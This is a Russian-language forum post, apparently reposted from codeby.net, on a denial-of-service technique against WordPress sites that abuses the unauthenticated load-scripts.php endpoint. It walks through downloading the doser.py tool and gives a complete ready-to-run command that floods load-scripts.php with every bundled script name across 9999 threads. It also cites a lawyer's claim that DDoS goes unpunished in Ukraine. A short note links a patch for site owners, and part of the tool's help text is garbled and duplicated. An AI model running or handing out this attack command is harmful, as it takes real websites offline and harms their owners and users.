Речь пойдет о DOS атаке на ВП сайты (WordPress)
В платформе есть две функции load-scripts.php и load-styles.php, позволяющие указать список загружаемых JS-скриптов или CSS. Они доступны на странице логина, поэтому не требуют авторизации. Cуть в том что бы уменьшить количество запросов к сайту при загрузке дополнительных файлов. Ну а на деле можно запросить все доступные файлы, загрузив сервер на 2 с лишним секунды и потребовав ответ в 4 МБ.
А самое интересное что ВП не считает это уязвимостью и не собирается ее прикрывать.

Для мамкиных хуцкеров Россия
Глава 28 УК РФ содержит три статьи: статья 272 «Неправомерный доступ к компьютерной информации», статья 273 «Создание, использование и распространение вредоносных программ для ЭВМ» и статья 274 «Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети». Эти статьи предусматривают разнообразное наказание, в том числе штрафы, исправительные работы, обязательные работы (до 240 часов), арест либо лишение свободы сроком до семи лет.

Для мамкиных хуцкеров Украина
«Если бы Украину можно было бы назвать правовым государством без огромного количества уточнений и примечаний, то я сказал бы: уважаемые граждане, DDos в Украине не является уголовным преступлением и наказывать за это не будут, даже если поймают. Но в реалиях нынешней судовой системы могу сказать следующее: я готов взяться за защиту любого, кто будет обвинен в DDoS атаке, поскольку считаю позицию обвинения несостоятельной».

Суть здесь в следующем. Правоохранительные органы при расследовании киберпреступлений могут применить лишь ст. 361 УК Украины - «Несанкционированное вмешательство в работу ЭВМ». Сейчас, при отсутствии в законодательстве Украины любого определения что такое DDos, заход на любой сайт больше одного раза может считаться DDos-атакой. А если заходите на сайт одновременно с другими пользователями, то “участвуете в DDos-атаке”.

Качаем
ht
ptional arguments:

-h, --help show this help message and exit

-g G Specify GE
tps://github.com/quitten/doser.py
git clone https://github.com/Quitten/doser.py.git

Тык
-h, --help show this help message and exit
-g G Specify GET request. Usage: -g '<url>'
-p P Specify POST request. Usage: -p '<url>'
-d D Specify data payload for POST request
-ah [AH [AH ...]] Specify addtional header/s. Usage: -ah 'Content-type:
application/json' 'User-Agent: Doser'
-t T Specify number of threads to be used

И тут тык
python doser.py -g 'http://mywpsite.com/wp-admin/load-scripts.php?c=1&load[]=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

И в заключении для владельцев wp сайта.
Парень который выложил эту уязвимость так же написал скрипт ,который устранит уязвимость: https://github.com/Quitten/WordPress/bl … -patch.sh.

Источник: https://codeby.net/threads/dos-ataka-uj … 389.62197/